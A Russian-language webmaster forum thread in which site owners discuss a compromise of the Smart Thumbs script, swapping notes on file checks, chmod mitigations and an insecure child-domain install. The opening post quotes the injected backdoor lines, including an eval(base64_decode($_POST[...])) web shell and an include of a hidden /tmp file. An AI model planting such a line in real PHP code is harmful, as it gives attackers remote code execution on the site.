С нами с 16.07.04
Сообщения: 678
Рейтинг: 702
|
 Добавлено: 19/02/10 в 18:51 |
Случайно сегодня обнаружил, что файлы variables.php были модифицированы на всех доменах, были вставлены строчки @include_once('/tmp/.ICE-unix/ases.tmp'); и кое-где @eval(base64_decode($_POST[qxp]));
Версия скрипта была 5.76... Т.е. после того, как смартовцы фиксили скрипт, опять нашлась какая-то уязвимоть...
Проверятесь...
|
|
|
|
| |
С нами с 10.10.03
Сообщения: 119
Рейтинг: 142
|
| Добавлено: 19/02/10 в 19:53 |
same shit
|
|
|
|
| |
CBR 600 RR
С нами с 17.12.03
Сообщения: 2755
Рейтинг: 1557
|
| Добавлено: 19/02/10 в 23:25 |
| iron-man писал: | Версия скрипта была 5.76... Т.е. после того, как смартовцы фиксили скрипт, опять нашлась какая-то уязвимоть...
Проверятесь... |
интересно, в последней версии 5.77 тоже это есть?
|
|
|
|
| |
♣ MAFIA ♣
С нами с 03.07.07
Сообщения: 1657
Рейтинг: 2246
|
| Добавлено: 20/02/10 в 00:23 |
на ADX-e не писал никто на эту тему? авторы скрипта там тусят
руками то врядли будет толк если удалять
|
|
|
|
Директор Порно Добывающего и Порно Перерабатывающего Комбината (ПДППК)
Я - люблю сиджепида!
|
0
|
|
| |
С нами с 10.10.03
Сообщения: 119
Рейтинг: 142
|
| Добавлено: 20/02/10 в 00:40 |
у меня версия 5.77
пока поставил права 444 на variables.php
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 20/02/10 в 01:15 |
а какая вообще защита стояла? (обновлённая версия защитой не является)
|
|
|
|
| |
С нами с 29.09.06
Сообщения: 1127
Рейтинг: 1237
|
| Добавлено: 20/02/10 в 10:41 |
есть несколько сиджей- один сделан главным, остальные пркручены к нему сабами
в file check странная хренотень:
на главном домене все файлы -OK
а на всех сабах:
| Код: |
flush.php - OK
search.php - OK
st.php - OK
st_counter.php - OK
admin/autocrop.php - OK
admin/check.php - OK
admin/cron.php - OK
admin/edit_picture.php - OK
admin/edit_spot.php - OK
admin/sync.php - OK
admin/thumbscan.php - OK
admin/traffic_check.php - OK
admin/win_edit.php - OK
admin/lock.php - OK
admin/secure.php - OK
admin/unlock.php - OK
admin/fhg_downloader.php - OK
admin/services.php - OK
admin/rotator.php - OK
classes/antibot_class.php - OK
classes/CropImage.php - OK
classes/functions.php - OK
classes/htaccess_class.php - OK
classes/mail_class.php - OK
classes/mysql_class.php - OK
classes/rotator_class.php - OK
classes/scan_class.php - OK
classes/nusoap.php - OK
submit/antibot.php - OK
submit/index.php - OK
admin/autocrop.php - unknown file
admin/check.php - unknown file
admin/cron.php - unknown file
admin/edit_picture.php - unknown file
admin/edit_spot.php - unknown file
admin/sync.php - unknown file
admin/thumbscan.php - unknown file
admin/traffic_check.php - unknown file
admin/win_edit.php - unknown file
admin/lock.php - unknown file
admin/secure.php - unknown file
admin/unlock.php - unknown file
admin/fhg_downloader.php - unknown file
admin/services.php - unknown file
admin/rotator.php - unknown file
classes/mysql.php - unknown file
classes/antibot_class.php - unknown file
classes/CropImage.php - unknown file
classes/functions.php - unknown file
classes/htaccess_class.php - unknown file
classes/mail_class.php - unknown file
classes/mysql_class.php - unknown file
classes/rotator_class.php - unknown file
classes/scan_class.php - unknown file
classes/nusoap.php - unknown file
submit/antibot.php - unknown file
submit/index.php - unknown file
flush.php - unknown file
|
почему сначало ОК и тут же для этих же файлов- неизвестный файл?
|
|
|
|
| |
С нами с 08.02.03
Сообщения: 10564
Рейтинг: 5962
|
| Добавлено: 20/02/10 в 11:00 |
/tmp/.ICE-unix/ases.tmp что тут есть?
|
|
|
|
| |
♣ MAFIA ♣
С нами с 03.07.07
Сообщения: 1657
Рейтинг: 2246
|
| Добавлено: 20/02/10 в 11:05 |
мы тут поковыряли с товарищами и пришли к выводу что это невычищенным осталось после ноябрьского взлома, судя по датам создания файлов variables
|
|
|
|
Директор Порно Добывающего и Порно Перерабатывающего Комбината (ПДППК)
Я - люблю сиджепида!
|
0
|
|
| |
С нами с 29.09.06
Сообщения: 1127
Рейтинг: 1237
|
| Добавлено: 20/02/10 в 11:16 |
| JM писал: | | /tmp/.ICE-unix/ases.tmp что тут есть? |
где точнее натйи такое ? в st/ не вижу таких папок..
|
|
|
|
| |
С нами с 10.10.03
Сообщения: 119
Рейтинг: 142
|
| Добавлено: 20/02/10 в 11:50 |
| Soft-Com писал: | | а какая вообще защита стояла? (обновлённая версия защитой не является) |
никаких дополнительных защит не ставил
|
|
|
|
| |
С нами с 16.07.04
Сообщения: 678
Рейтинг: 702
|
| Добавлено: 20/02/10 в 14:46 |
| Foxy Babe писал: | | мы тут поковыряли с товарищами и пришли к выводу что это невычищенным осталось после ноябрьского взлома, судя по датам создания файлов variables |
у меня файлы были изменены 16 февраля... После ноябрьского взлома я все вычистил, видимо пролезли снова...
|
|
|
|
| |
С нами с 10.10.03
Сообщения: 119
Рейтинг: 142
|
| Добавлено: 26/02/10 в 21:05 |
сегодня опять эта зараза появилась. не помог и chmod 444 variables.php
|
|
|
|
| |
С нами с 10.10.03
Сообщения: 119
Рейтинг: 142
|
| Добавлено: 03/03/10 в 00:42 |
отловили таки корень этой гадости. спасибо большое Soft-Com! 
|
|
|
|
| |
+ +
клоны загельмахера
С нами с 11.10.08
Сообщения: 14532
Рейтинг: 1943
|
| Добавлено: 03/03/10 в 10:37 |
| Manowar писал: | | почему сначало ОК и тут же для этих же файлов- неизвестный файл? |
Патамушта скрипт криво заинсталлил, чилды не надо инсталлировать через install.php На форуме Smart Thumbs написано как бороться с кривым инсталлом, можно топик поискать "unknown file"... на сколько помню, сохранить темплатесы и удалить все из папки st на чилд домене, потом зайти на основной домен в админку в раздел настроек и нажать сохранение, Smart Thumbs сам сделает файлы которые нужны на чилде... там вместо всей этой кучи ненужных файлов будет всего несколько...
и вот когда так криво инсталлируют, то и ломается все легко... точнее там даже ломать не надо, потому что на чилд-доменах админка не защищена вообще... ее там просто не должно быть, только вариаблес...
|
|
|
|
| |
С нами с 16.07.04
Сообщения: 678
Рейтинг: 702
|
| Добавлено: 14/06/10 в 11:33 |
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 14/06/10 в 11:53 |
скорее всего изначально не всё вычищено было
|
|
|
|
| |
С нами с 16.07.04
Сообщения: 678
Рейтинг: 702
|
| Добавлено: 14/06/10 в 16:12 |
А что они вообще делают, когда пролезут? Как используют уязвимость?
|
|
|
|
| |
С нами с 20.02.06
Сообщения: 248
Рейтинг: 366
|
| Добавлено: 15/06/10 в 00:29 |
iron-man: судя по eval'у - как шелл, или сплойты какие-нибудь заливают
|
|
|
|
| |
Пролазит и все тут, эта зараза 